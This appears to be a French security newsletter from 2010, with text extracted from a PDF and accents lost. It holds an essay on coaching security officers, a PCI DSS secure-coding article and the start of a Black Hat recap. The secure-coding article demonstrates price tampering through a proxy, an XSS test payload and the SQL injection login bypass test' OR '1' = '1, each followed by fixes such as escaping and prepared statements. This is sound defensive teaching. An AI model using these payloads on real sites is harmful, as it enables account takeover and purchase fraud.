Je pars du principe quaucune problmatique nest insoluble, et que lchec sexplique souvent par une dmarche perfectible, une apprciation de la situation errone, ou fausse. Le monde dans lequel nous nous inscrivons en 2010 est un monde de l'instantan : tout doit arriver tout de suite, partout, et rien ne doit souffrir de la moindre attente. La ractivit est dailleurs souvent un critre de choix important lors de la prise dune dcision. Tout le monde a donc pris lhabitude et trouve normal que les dlais dattente soient raccourcis au minimum : une lettre arrive moins de 24 heures aprs son envoi, un email, moins de 10 secondes, un fax idem, une commande sur internet est livre en moins de 48 heures, etc.

Et pendant le temps rduit dattente, il faut absolument connatre le temps prvisionnel pendant lequel il faudra patienter, cest un critre de qualit et de confort pour le client. Il faut une traabilit parfaite, chacun veut savoir o se trouve son colis, o en est sa demande, et savoir quand la rponse arrivera.

Lorsquune tche raliser se prsente, elle est identifie, industrialise, duplique, externalise, procde, mesure, vrifie, et surtout, ralise avec des temps de rponse qui sont autant darguments de vente pour les marchands: livraison en 24h chrono!

Malheureusement, une Politique de Scurit en 24 heures Chrono, personne ny arrive! Pourquoi? Parce quil faut accepter, face une question complexe, de se poser et de rflchir. De prendre son temps dans un monde qui nen a pas. Danalyser tte repose et de construire la dmarche adapte pour y rpondre. Et pendant ce temps, il se passe quoi ? Existe-t-il des tableaux de bord pour suivre lvolution de vos rflexions? Non En gros, pour les autres acteurs qui ne sont pas dans votre tte, il ne se passe rien, DONC, VOUS NE FAITES RIEN, et a, cest littralement inconcevable dans une entreprise.

La rponse classique : FAIRE, mme nimporte quoi, mais FAIRE, et surtout que a se voit et que personne ne pense quon ne fait rien. Nous constatons tous les jours les consquences de cette pression qui pousse

Alors quune mission de consei l classique sappuie toujours sur un contexte technique et organisationnel tabli, clair, une mission de coaching intervient justement lorsque certains points sont flous, que certains enjeux ne peuvent tre exprims, mais quil faut quand mme les prendre en compte

avancer, y compris dans la mauvaise direction, mme malgr soi : des projets qui chouent, faute de navoir pas eu le temps de trouver la rponse adquate et davoir agi selon sa premire impulsion. Normal, il fallait faire vite

Le coaching oprationnel na pas pour objectif de faire, mais de russir. La russite nest pas une fatalit, au mme titre que lchec, cest la consquence programme dune dmarche construite, base sur le contexte rel, les enjeux, les acteurs et lobjectif dfini initialement. La premire tape commence toujours par cerner les attentes, comme pour nimporte quelle mission de conseil, sauf que cette fois, des critres subjectifs, ou implicites viennent tre pris en compte: des enjeux politiques, un contexte social dgrad, une campagne mdia difficile peuvent influencer fortement les moyens de rpondre une question.

Alors quune mission de conseil classique sappuie toujours sur un contexte technique et organisationnel tabli, clair, une mission de coaching intervient lorsque justement certains points sont flous, que certains enjeux ne peuvent tre exprims, mais quil faut quand mme les prendre en compte

En outre, il arrive parfois quil faille produire, et que votre client ne soit pas en mesure de le faire. Dans ces cas, je considre que la mission du coach oprationnel est de sinvestir dans la ralisation oprationnelle, et daccompagner son client dans la production concrte: DIRE un client ce quil faut faire ne vaut pas FAIRE avec le client . Cest peut-tre ce qui nous diffrencie le plus des coachs, dont lun des principes fondateurs, est de ne pas simpliquer dans la prise de dcision de leurs coachs. Je prfre, pour ma part, prendre le risque de me tromper avec mon client, parce



COACHING RSSI LACTU SCU N26

WWW.XMCOPA

RTN

ERS.COM


que je sais que jen assumerai les consquences, plutt que de labandonner en cours de route.

Des mtriques?

Lune des difficults des missions daccompagnement concerne le cadre que lon se fixe. On ne peut pas voquer le terme oprationnel sans prjuger de rsultats tangibles et objectifs. Pourtant, prparer un client pour une soutenance, le rendre percutant et lui permettre datteindre ses objectifs ne prouve pas quil naurait pas t efficace sans vous, peut-tre diffremment, dailleurs. Se pose alors une question fondamentale sur les sujets couverts par la mission : faut-il se limiter des aspects techniques? Est-ce quil est possible daborder des domaines proches des s c i e n c e s h u m a i n e s ? C o m m e n t p a r l e r d e communication ? Et surtout, en dfinitive, comment trouver le meilleur moyen de communiquer avec ses interlocuteurs?

Chaque client trouve ses propres rponses, ou plutt se pose ses propres questions, et il appartient au couple client/prestataire de dfinir la grille de notation dune mission de coaching. Pour ma part, jai dfini une chelle de mesure, selon plusieurs axes trs diffrents, dont lobjectif est de saccorder sur une mtrique commune.

Au dbut de chaque mission, le contexte existant, toujours subjectif, est traduit en valeurs objectives et calcules. Ce constat de dpart permet de fixer des axes damlioration clairs.

En appliquant la mme mthode de suivi tout au long du droulement de nos missions daccompagnement, la mesure des progrs devient beaucoup plus facile, de mme que dventuelles rorganisations dans les priorits des clients.

Quel procs verbal de recette ?

Comme dans une mission de conseil classique, il est question de livrable. Mais lequel ? Comment mesure-t-on la popularit du RSSI ? Par un sondage ?! Encore une fois, ce type de questions tordues trouve galement des rponses, aptes fournir des rponses objectives sur une prestation de coaching. Mais pour les trouver, il faut sinterroger sur la qute relle du client qui sollicite un coach: quels sont les lments qui le laissent penser qu i l est impopulaire ? Quels sont les faits objectifs attestant dun dficit de lgitimit vis--vis de ses interlocuteurs? Des utilisateurs?

Cest la fin des missions que lutilisation des mtriques apparat la plus essentielle pour passer aux tapes ultrieures. Elles rassurent quant la ralit des progrs effectus et clairent la suite du chemin parcourir.

Le livrable idal, dans une mission de coaching oprationnel, nest pas uniquement un document, un logiciel ou une note : il est aussi ressenti par le client, qui, travers plusieurs signaux quil percevra dans son contexte, percevra aussi lvolution positive de sa situation.

Lorsquun client, face une difficult, a le sentiment davoir progress, davoir avanc, davoir russi, un peu grce vous, il attend juste la prochaine fois avec un peu plus de confiance en lui et un peu moins dapprhension. Cest le meilleur PV de recette que vous puissiez recevoir.



COACHING RSSI

WWW.XMCOPA

RTN

ERS.COM

LACTU SCU N26


La scurit applicative est essentielle lors dun audit PCI DSS. Pourtant, seuls quelques points parmi les nombreux contrles imposs concernent les applications web. Nanmoins, aprs plusieurs accompagnements PCI-DSS, les mmes erreurs reviennent sans cesse.

Ce premier article aborde les vulnrabilits suivantes : "Parameter Tampering", "Cross-Site Scripting - XSS", et "Injection SQL". Ces concepts ont t vus et revus et ne constitueront, pour certains, quun simple rappel.

Nous verrons galement comment nous prmunir face de telles vulnrabilits en nous concentrant sur le serveur web . Le prochain article se concentrera sur les bases de donnes.

Architecture fonctionnelle

L'internaute visite le site web, choisit un produit et le paie en saisissant le numro de sa carte bancaire. Le site web reoit la commande et l'envoie au serveur d'applications interne via un web service.

Il sen suit quelques vrifications anti-fraude simples (le numro de la carte est-il valide vis--vis de la cl de Lhun ?). Ds la rception de la confirmation d'autorisation en provenance du prestataire de paiement, le serveur applications dclenche l'envoi du produit achet sur la plate-forme logistique en insrant la commande dans une table de la base de donnes.


L'A

CTU

S

CU

N2

6

WWW.XMCOPA

RTN

ERS.COM

Prsentation des vulnrabilits les plus communes dans le cas dune application e-commerce

Cet article est le premier d'une srie de trois, portant sur le dveloppement scuris de sites web, dans le but de rpondre au standard PCI DSS en se basant sur le guide de l'Open Web Application Security Project (OWASP).

Lobjectif n'est pas d'explorer en profondeur l'ensemble des vulnrabilits possibles, mais de prsenter les vulnrabilits les plus communment rencontres ainsi que les moyens de les corriger. Afin d'illustrer ces articles, nous nous baserons sur le dveloppement d'un site de e-commerce factice. Cet article sadresse principalement aux RSSI et aux dveloppeurs dapplications web.

Stphane JIN XMCO | Partners

E-COMMERCE ,PCI DSS ET SCURIT APPLICATIVE


Architecture technique

Le site web se dcompose comme bien souvent en un Front-End permettant la visualisation des pages web, et en un Back-End permettant le traitement des donnes. Plus spcifiquement, l'application web sera dveloppe de la manire suivante:

Front-End

Serveur Web Apache Tomcat

Back-End

Serveur d'applications Apache Tomcat associ un Apache Axis (Web Service) Base de donnes Oracle (Express)

Le serveur plac en Front-End communique avec le serveur plac en Back-End laide dun web service.

Nous utiliserons la technologie Java Enterprise Edition (Java EE, anciennement J2EE) pour dvelopper notre site factice.

Vulnrabilit n1 : Parameter Tampering

[PCI DSS #6.5.4] Prevent Insecure direct object references http://www.owasp.org/index.php/Web_Parameter_Tampering

Rappel

Le chapitre 6 du PCI DSS prsente une srie dexigences relatives au dveloppement scuris des applications web. Parmi ces exigences, lune requiert que les applications se prmunissent contre les vulnrabilits de type Insecure direct objectif references. Cette exigence est directement tire du Top Ten OWASP 2007 et correspond concrtement aux attaques que nous appelons Parameter Tampering.

Les attaques de Parameter Tamperingering sont bases sur des manipulations des paramtres changs entre un client et le serveur dans le but de modifier la logique de lapplication. Autrement dit, en modifiant la valeur de paramtres envoys par le navigateur web lapplication web, et si cette dernire

est vulnrable ce type d'attaque, il est possible de modifier malicieusement des donnes business de la transaction, tel que le prix de vente d'un objet pour un site de e-commerce, ou encore daccder des informations normalement interdites, telles que le compte bancaire d'un autre utilisateur pour une banque en ligne.

Ces paramtres peuvent aussi bien se trouver dans un cookie, dans des champs cachs de formulaires (POST), ou encore tout simplement dans l'URL d'accs une ressource (GET).

Parmi les exigences du PCI DSS , lune requiert que les applications se prmunissent contre les vulnrabilits de type Insecure direct objectif references...



E-COMMERCE, PCI DSS ET SCURIT APPLICATIVE LACTU SCU N26

WWW.XMCOPA

RTN

ERS.COM

http://www.owasp.org/index.php/Web_Parameter_Tamperinghttp://www.owasp.org/index.php/Web_Parameter_Tamperinghttp://www.xmcopartners.comhttp://www.xmcopartners.com

Exploitation de la vulnrabilit

Nous souhaitons acheter le produit dnomm Console PS3 Slim 250 Go Sony + God Of War III. Celui-ci est disponible au prix de 349.00.

A laide dun simple proxy web, tel que Paros, nous interceptons la requte envoye par notre navigateur avant que celle-ci narrive au serveur du site e-commerce.

Nous constatons que le prix du produit est envoy dans le corps de la requte. Essayons de le modifier ce prix.

Apparemment, la modification du prix a bien t prise en compte par le site.

Que sest-il pass? Comme indiqu dans la description de la vulnrabilit, nous avons modifi une donne envoye par le navigateur au serveur web du site de e-commerce. Ce dernier, qui se base sur des informations reues par le client, a donc pris en compte le prix modifi.

Solution

La correction de ce type de vulnrabilit est assez simple. En effet, il suffit de ne plus faire confiance aux donnes envoyes par le client, surtout lorsquil sagit de donnes critiques telles que le prix dun produit. Au lieu de cela, lapplication aurait d stocker cette donne importante du ct du serveur web, et ne faire transiter quun identifiant permettant de faire le lien avec le produit slectionn et le prix associ.

Exemples de code

Nous modifions le code comme dcrit prcdemment pour ne prendre en compte que lidentifiant du produit. Cet identifiant est ensuite envoy au serveur situ en Back-End afin de rcuprer le prix du produit et le rajouter au panier.

Il faut modifier lapplication web pour ne plus transmettre les informations, et notamment le prix, lors de lajout dun produit au panier dachats.

Aprs ces changements, il ne sera plus possible de modifier le prix dun produit et lapplication est protge contre les vulnrabilits de type Prevent Insecure direct object references (PCI DSS#6.5.4), tout du moins pour ce paramtre.




WWW.XMCOPA

RTN

ERS.COM


Vulnrabilit 2 : Cross-Site Scripting - XSS

[PCI DSS #6.5.1] Prevent Cross-Site Scripting (XSS)http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Rappel

Daprs lOWASP, les attaques de XSS sont lies des problmes dinjection. Lattaquant va injecter du code malveillant, le plus souvent du JavaScript, dans une page destine sa victime. Ce type de vulnrabilit est trs rpandu sur les applications web. Du XSS peut apparatre nimporte quel endroit, ds lors que lapplication web utilise une donne envoye par un utilisateur dans la rponse quelle gnre, sans valider ou encoder ladite donne.

Il existe plusieurs types XSS :

1. XSS rflchi (Reflected XSS en anglais): Dans ce type de XSS, le code malveillant est rflchi par le serveur web.

# ex: Un utilisateur envoie une requte vers une # ressource qui nexiste pas. Le serveur renvoie # alors une page derreur contenant le nom de la # ressource inexistante sans contrle pralable.

2. XSS stock (Stored XSS en anglais): Dans ce type de XSS, le code malveillant est stock de faon permanente sur le serveur, par exemple au sein dune base de donnes. Lattaque est dclenche ds quune victime visualise la page contenant linformation malveillante.

# ex: Une vulnrabilit de type XSS stock existe # sur la partie commentaires dun site web. Un # attaquant va alors exploiter cette vulnrabilit # pour crire du code malveillant dans un # commentaire. Chaque utilisateur lgitime qui # verra son commentaire sera ainsi affect.

3. XSS bas sur le DOM (Dom Based XSS): Ce type de XSS est galement connu sous le nom de type-0 XSS. Il est diffrent des deux types prcdents, car la rponse renvoye par le serveur ne contient pas de code malveillant. En effet, linjection est ralise travers la manipulation locale du Document Object Model (DOM).

Pour corriger les failles XSS, il est possible dutiliser des fonctions existantes dans le langage utilis (ex: la fonction htmlentities() en PHP), ou encore mieux, une bibliothque spcialise en scurit telle que ESAPI...

INFOXSS et Youtube

Lun des sites d'hbergement de vidos les plus populaires au monde a rcemment t victime de XSS permanent. Un pirate pouvait, par exemple, voler le cookie de session d'un utilisateur ou mener des attaques de type phishing (page affichant un faux formulaire afin de voler les identifiants et mots de passe...).

Mme les sites les plus visits au monde ne sont pas l'abri des vulnrabilits les plus communment rencontres. Des chercheurs en scurit d'un groupe roumain appel InSecurityRomania ont rvl trs rcemment une vulnrabilit affectant YouTube. Celle-ci concernait les commentaires des vidos. En ajoutant une balise dans le commentaire d'une vido, un attaquant pouvait injecter du code HTML/JavaScript qui tait stock dans la base de donnes. (ex:

ex: Supposons que la page d'accueil dun site web contienne un code JavaScript rcuprant la valeur du paramtre language situ dans lURL et laffiche comme une des options dans une liste droulante.

...document.write("" + document.URL.substring(document.URL.indexOf("language=")+9) + "");

En modifiant la valeur du paramtre# language, il est alors possible dinjecter du JavaScript malveillant.

Le XSS permet in fine un attaquant dexcuter du code malveillant dans le navigateur de sa victime. Il devient possible, par exemple, de voler le cookie de session dun utilisateur, ou encore de modifier compltement lapparence dune page web pour afficher une fausse page didentification et ainsi voler des identifiants de connexion.


Le site de e-commerce dispose dun champ de recherche et nous nous apercevons que celui-ci raffiche le mot-cl recherch, pralablement saisi par linternaute.

Voyons si ce champ est vulnrable une faille XSS en insrant le code JavaScript suivant:

alert(XSS)

Si le champ est vulnrable, le site devrait afficher une pop-up contenant XSS .

Le champ de recherche est donc vulnrable au XSS. En incitant un client du site suivre une URL spcialement conue, il doit tre possible dusurper lidentit dudit client.

Comme prsents dans la description de la vulnrabilit, nous pouvons penser que le mot-cl utilis pour la recherche est raffich dans la page sans aucun traitement pralable, ce qui permet dinjecter du code qui sera interprt par le navigateur.

Solution

Pour corriger ce type de vulnrabilit, il est ncessaire dutiliser lchappement. Ce dernier est utilis pour sassurer que les donnes sont bien traites en tant que telles, et quelles ne sont pas interprtes par le parseur du navigateur. Certaines techniques consistent dfinir un caractre spcial dchappement (ex: \), dautres consistent en une syntaxe plus complexe mettant en oeuvre plusieurs caractres (ex: remplacer

Exemple de code

Nous allons ici utiliser la bibliothque ESAPI. Celle-ci dispose de nombreuses mthodes, dont une qui nous intresse particulirement : encodeForHTML(). Comme son nom lindique, cette mthode permet dchapper des donnes, pour les utiliser de manire scurise directement dans le corps HTML.

Le champ en question nest alors plus vulnrable au XSS.

Dautres mthodes permettent dchapper des donnes insrer dans dautres parties dune HTMLHTML :

encodeForHTMLAttribute() : chappement avant insertion dans un attribut HTML.

encodeForJavaScript() : chappement avant insertion dans du JavaScript.

encodeForCSS() : chappement avant insertion dans une feuille ou une balise de style.

encodeForURL() : chappement avant insertion dans un paramtre dURL.

Notre champ de recherche est dsormais conforme lexigence PCI DSS 6.51 relative au XSS. Reste encore vrifier tous les autres champs...




WWW.XMCOPA

RTN

ERS.COM

INFOUn site d'American Express transmettait des informations bancaires en clair

Il semblerait que mme les entreprises les plus importantes peuvent commettre les erreurs les plus simples. C'est ainsi qu'un des sites d'American Express, socit ayant pourtant particip la cration du standard industriel PCI DSS, transmettait des informations bancaires en clair sur internet.

Joe Damato, un ingnieur en informatique, aurait reu un mail promotionnel de la part d'American Express l'incitant s'inscrire au service "Daily Wish". Ce service permet aux dtenteurs de cartes American Express de recevoir des rductions sur certains produits tels que des camscopes ou des ordinateurs.

En se rendant sur le site de "Daily Wish", Joe Damato se serait aperu que les donnes demandes par ledit site (nom, prnom, adresse, numro de carte, cryptogramme visuel...) taient en fait transmises en clair vers un serveur d'American Express. En effet, alors que le site indique "Cette page est scurise", les donnes taient envoyes sans utiliser le

protocole SSL, et donc sans chiffrement...


Vulnrabilit 3 : Injection SQL

[PCI DSS #6.5.2] Prevent Injection flaws, particularly SQL injection. Also consider LDAP and Xpath injection flaws as well as other injection flaws. http://www.owasp.org/index.php/SQL_Injection

Les rsultats des analyses post-mortem (forensics) suite des cas de piratage de cartes de crdit sur des sites e-commerce rvlent que dans la majorit des cas, les pirates ont exploit une faille dinjection SQL du site pour lire les numros de carte stocks en clair dans les tables de la base de donnes. Ce type de faille est certainement lune des raisons de lapparition du standard PCI DSS, compte tenu du nombre de vols de donnes de carte (data breach) quelles ont permis.

Tout comme les attaques de XSS, les attaques dinjection SQL consistent insrer du code malveillant par le biais dun paramtre, en entre, non contrl par lapplication et dont la valeur est entre par lutilisateur.

En exploitant une faille dinjection SQL, un attaquant peut faire excuter une requte SQL de son choix au site web afin de rcuprer des informations sensibles, modifier des donnes contenues dans la base, effectuer des oprations dadministration de la base, voire dans certains cas, prendre le contrle du systme dexploitation sous-jacent.


Imaginons que nous souhaitions nous connecter au compte n 15 dont nous ne connaissons pas le mot de passe.

Essayons le mot de passe test.

Cependant, celui-ci nest pas le bon :).

Le rsultat est identique lorsque nous tentons dentrer un caractre dans le champ du mot de passe. Essayons tout de mme une injection SQL.

Saisissons alors le code SQL suivant dans le champ destin au mot de passe:

test' OR '1' = '1

Nous nous apercevons alors que la page de login est vulnrable aux injections SQL.

Nous parvenons ainsi accder au compte n15 sans connatre le mot de passe correspondant.




WWW.XMCOPA

RTN

ERS.COM

http://www.owasp.org/index.php/SQL_Injectionhttp://www.owasp.org/index.php/SQL_Injectionhttp://www.xmcopartners.comhttp://www.xmcopartners.com

Nous pouvons en dduire que lapplication web ne contrle pas les donnes insres dans la requte dauthentification, ce qui est en effet le cas :

En effet, dans le code source, le mot de passe, password, est directement concatn, sans aucun contrle, la requte SQL qui est envoye la base. Il est ainsi possible daltrer le comportement de la requte en y insrant des commandes SQL non prvues.

Solution

Comme nous lavons prcis au dbut de cet article, nous nous intressons seulement au serveur web. Les moyens de corriger ce type de vulnrabilit directement dans la base de donnes ne seront donc pas abords dans la suite. Seules les protections relatives au code applicatif seront revues.

Exemple de code

Requtes prpares

Afin de corriger cette vulnrabilit, il est possible dutiliser des requtes prpares. Celles-ci forcent le dveloppeur dfinir et typer lavance tout le code SQL, et ensuite passer les donnes en tant que paramtre la requte. Ce style de programmation permet la base de donnes de faire la distinction entre les donnes et le code.

Nous corrigeons le code de lapplication pour utiliser les requtes prpares. En langage Java EE, celles-ci correspondent la classe PreparedStatement.

...il est possible dutiliser des requtes prpares. Celles-ci forcent le dveloppeur dfinir et typer lavance tout le code SQL...

Ainsi, la page dauthentification nest plus vulnrable aux injections SQL.

chappement de donnes

Linjection SQL tant due des donnes saisies par lutilisateur et non contrles par lapplication, un autre moyen de parer cette vulnrabilit est dchapper les caractres spciaux du langage SQL. Lchappement permettra que les donnes utilisateurs ne puissent jamais tre interprtes par la base de donnes comme des commandes SQL.

chappement spcifique la base de donnes

Chaque SGBD dispose de ses propres caractres dchappement. Dans le cas de la base de donnes Oracle 10g, il faut placer la chane de caractres chapper entre les caractres { et }.Cependant, il est important de noter que la chane de caractres chapper ne doit pas dj contenir de }. Si elle en contient, il est ncessaire de les remplacer par }}, afin de ne pas introduire de vulnrabilit.




WWW.XMCOPA

RTN

ERS.COM


Notons ici que la chane de caractre password a t mise entre { et }. De cette manire, il nest plus possible dexploiter cette variable pour des injections SQL.Note: dans cet exemple, la variable id_client nest pas chappe, car elle correspond un entier dont la valeur a t vrifie au pralable.

Utilisation dune bibliothque spcialise

Tout comme avec les vulnrabilits XSS, il est possible dutiliser des bibliothques de dveloppement telles que ESAPI de lOWASP.

Nous avons de nouveau utilis la bibliothque de dve loppement ESAPI . Cel le-c i d ispose de nombreuses mthodes, dont une qui nous intresse particulirement: encodeForSQL(). Comme son nom lindique, cette mthode permet dchapper des donnes, pour les utiliser de manire scurise directement dans une requte SQL. Cette fonction prend galement en paramtre un codec permettant dencoder/dcoder les donnes en fonction du SGBD.Voici donc comment rpondre l'exigence PCI DSS 6.5.2 relative la prvention contre les failles dinjection SQL.

Conclusion

Dans le cas dune application web, il est ncessaire de considrer que lutilisateur nest pas une personne de confiance. Comme le dit ladage : never trust user input .Il est donc impratif de contrler et de valider toutes les donnes pouvant tre modifies ou pouvant avoir pour origine un utilisateur de lapplication.Ce principe est impos par le PCI DSS, mais il sagit avant tout dune bonne pratique qui doit sappliquer bien au-del du contexte des environnements de paiement.

Annexe : OWASP Security API

h t t p : / / w w w . o w a s p . o r g / i n d e x . p h p /Category:OWASP_Enterprise_Security_API

ESAPI est une bibliothque de dveloppement scurise, gratuite et open-source. Le but dESAPI est de permettre aux dveloppeurs d crire des applications web les plus scurises possible.

ESAPI est conue de telle manire ce que le moins de changement soit ncessaire pour son utilisation dans des applications prexistantes.ESAPI est disponible dans de nombreux langages : Java EE, .NET, ASP classique, PHP, ColdFusion/CFML, Python, JavaScript, Haskell, Force.com, et Ruby.

Installation de ESAPI pour Java EE et utilisation dans Eclipse

Note: Au moment de la rdaction de cet article, ESAPI ntait pas disponible en version finale.Linstallation de la bibliothque ESAPI est relativement simple.Tout dabord, il suffit de se rendre sur le site de lOWASP afin de tlcharger la dernire version de la bibliothque.

Aprs avoir dcompresser le fichier tlcharg, il faut ajouter larchive .jar ESAPI dans le classpath : cliquer sur le projet concern dans le Project Explorer, puis slectionner Project > Properties > Java Build Path > Librairies. Si larchive .jar ESAPI a t place dans le rpertoire du projet concern, utiliser Add JARS. Sinon utiliser Add External JARS si vous avez lhabitude de maintenir un rpertoire spar pour les archives JAR.




WWW.XMCOPA

RTN

ERS.COM

http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_APIhttp://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_APIhttp://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_APIhttp://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_APIhttp://www.xmcopartners.comhttp://www.xmcopartners.com

Ensuite, localiser les fichiers ESAPI.properties et validation.properties se trouvant normalement dans le sous-rpertoire configuration/.esapi et les copier autre part. Si vous ne savez pas o placer ces fichiers, il est possible de les copier dans un rpertoire nomm .esapi et de placer ce dernier dans votre rpertoire personnel (ex: Mes documents sous Windows).

Si vous avez choisi de ne pas placer les 2 fichiers prcdents dans lemplacement indiqu ci-dessus, il est ncessaire dindiquer la JVM o elle peut les trouver via un argument : Run > Run Configuration (ou Debug Configuration). Slectionner longlet Arguments et ajouter dans le champ VM Arguments :

-Dorg.owasp.esapi.resources="/Chemin/complet/vers/.esapi"

O /Chemin/complet/vers/.esapi correspond au chemin absolu ou relatif vers le rpertoire contenant les fichiers ESAPI.properties et validation.properties.

Il est possible dinclure ESAPI dans toutes les configurations de lancement en indiquant la mme information que ci-dessus, mais dans Preferences > Java > Installed JREs > Edit.

Le cas chant, ne pas oublier dajouter larchive .jar ESAPI dans le rpertoire WebContent/WEB-INF/lib de lapplication concerne en faisant un glisser-dposer dans le Project Explorer.

E S A P I e s t u n e b i b l i o t h q u e d e dveloppement scurise, gratuite et Open-Source. Le but dESAPI est de permettre aux dveloppeurs dcrire des applications web les plus scurises possible...

Rfrences

Web Parameter Tampering - OWASP :h t t p : / / w w w . o w a s p . o r g / i n d e x . p h p /Web_Parameter_Tampering

Cross-Site Scripting (XSS) - OWASP :http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

XSS (Cross Site Scripting) Prevention Cheat Sheet - OWASP :h t t p : / / w w w . o w a s p . o r g / i n d e x . p h p / X S S _(Cross_Site_Scripting)_Prevention_Cheat_Sheet

SQL Injection - OWASP :h t t p : / / w w w . o w a s p . o r g / i n d e x . p h p / X S S _(Cross_Site_Scripting)_Prevention_Cheat_Sheet

SQL Injection Prevention Cheat Sheet - OWASP :h t t p : / / w w w . o w a s p . o r g / i n d e x . p h p /SQL_Injection_Prevention_Cheat_Sheet

OWASP Enterprise Security API - OWASP :h t t p : / / w w w . o w a s p . o r g / i n d e x . p h p /Category:OWASP_Enterprise_Security_API




WWW.XMCOPA

RTN

ERS.COM

http://www.owasp.org/index.php/Web_Parameter_Tamperinghttp://www.owasp.org/index.php/Web_Parameter_Tamperinghttp://www.owasp.org/index.php/Web_Parameter_Tamperinghttp://www.owasp.org/index.php/Web_Parameter_Tamperinghttp://www.owasp.org/index.php/Cross-site_Scripting_(XSShttp://www.owasp.org/index.php/Cross-site_Scripting_(XSShttp://www.owasp.org/index.php/Cross-site_Scripting_(XSShttp://www.owasp.org/index.php/Cross-site_Scripting_(XSShttp://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheethttp://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_APIhttp://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_APIhttp://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_APIhttp://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_APIhttp://www.xmcopartners.comhttp://www.xmcopartners.com

Black Hat 2010 Barcelone

Comme les annes passes, XMCO avait la chance de participer lun des vnements les plus attendus : la Black Hat 2010 EUROPE qui se droulait Barcelone du 12 au 15 avril. Aprs avoir sig pendant quelque temps Amsterdam, les organisateurs se sont tourns vers une destination plutt agrable, festive et accessible (malgr un retour ponctu par les expirations du volcan Eyjafjll).

Quelques nouveauts ont agrment lorganisation, avec l'apparition de 3 t racks abo rdan t t ro i s thmes diffrents : Application Security, The Big picture et Hardware pour le premier jour et Exploit, Forensics and Privacy et Application Security pour le second.

Comme chaque anne, la plupart des confrences taient attrayantes, avec des sujets novateurs ou des angles de vue qui navaient jusqu'alors jamais t abords. Malheureusement, d'autres ont du avec des sujets vus et revus (fuzzing, analyse de malware ou cyberwar...).Entrons maintenant dans le vif du sujet avec un petit tour d'horizon des principales sessions auxquelles nous avons assist.

Cyber[Crime|War] charing dangerous water - Iftach Ian AmitLa premire confrence fut prsente par Iftach Ian

Amit, consultant et chercheur. Il a dcrit les liens entre la cybercriminalit et les cyberguerres au travers d'exemples trs parlants.Le parallle entre ces deux mondes, leur organisation et leurs buts est troublant et la frontire apparat souvent troite. De la cyberguerre d'Estonie (botnet utilis pour mener des attaques massives), en passant par la Gorgie ou la recrudescence de socits russes mafieuses (ESTDomains, RBN, Realhost, Atrivo, Miconnet, Mccolo, Eexhost), toutes c e s a f f a i r e s r e l i e n t t o u j o u r s l a cybercriminalit aux attaques massives en direction d'autres pays...

Whitepaper :https://media.Black Hat.com/bh-eu-10/

whitepapers/Adelsbach/Black Hat-EU-2010-Adelsbach-Misusing-Wireless-ISPs-wp.pdf

Slides :https://media.Black Hat.com/bh-eu-10/presentations/Amit/Black Hat-EU-2010-Amit-Cyber-%5BCrime_War%5D-Connecting-the-dots-slides.pdf


WWW.XMCOPA

RTN

ERS.COM

L'A

CTU

S

CU

N2

6

HACKITOBLACK HAT 2010

ET SSTIC

Hackito, Black Hat et SSTIC

L't et le printemps annoncent toujours l'arrive de confrences scurit : CanSecWest, Hackito, Black Hat, SSTIC, HITB...

Les consultants XMCO vous proposent un rsum des vnements les plus attendus!

Stphane JINCharles DAGOUATYannick HAMONAdrien GUINAULTFranois LEGUE

XMCO | Partners

http://www.notre-planete.info/actualites/actu_2318_eruption_volcan_Eyjafjoll_Islande.phphttp://www.notre-planete.info/actualites/actu_2318_eruption_volcan_Eyjafjoll_Islande.phphttps://media.blackhat.com/bh-eu-10/whitepapers/Adelsbach/BlackHat-EU-2010-Adelsbach-Misusing-Wireless-ISPs-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Adelsbach/BlackHat-EU-2010-Adelsbach-Misusing-Wireless-ISPs-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Adelsbach/BlackHat-EU-2010-Adelsbach-Misusing-Wireless-ISPs-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Adelsbach/BlackHat-EU-2010-Adelsbach-Misusing-Wireless-ISPs-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Adelsbach/BlackHat-EU-2010-Adelsbach-Misusing-Wireless-ISPs-wp.pdfhttps://media.blackhat.com/bh-eu-10/whitepapers/Adelsbach/BlackHat-EU-2010-Adelsbach-Misusing-Wireless-ISPs-wp.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Amit/BlackHat-EU-2010-Amit-Cyber-%5BCrime_War%5D-Connecting-the-dots-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Amit/BlackHat-EU-2010-Amit-Cyber-%5BCrime_War%5D-Connecting-the-dots-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Amit/BlackHat-EU-2010-Amit-Cyber-%5BCrime_War%5D-Connecting-the-dots-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Amit/BlackHat-EU-2010-Amit-Cyber-%5BCrime_War%5D-Connecting-the-dots-slides.pdfhttps://media.blackhat.com/bh-eu-10/presentations/Amit/BlackHat-EU-2010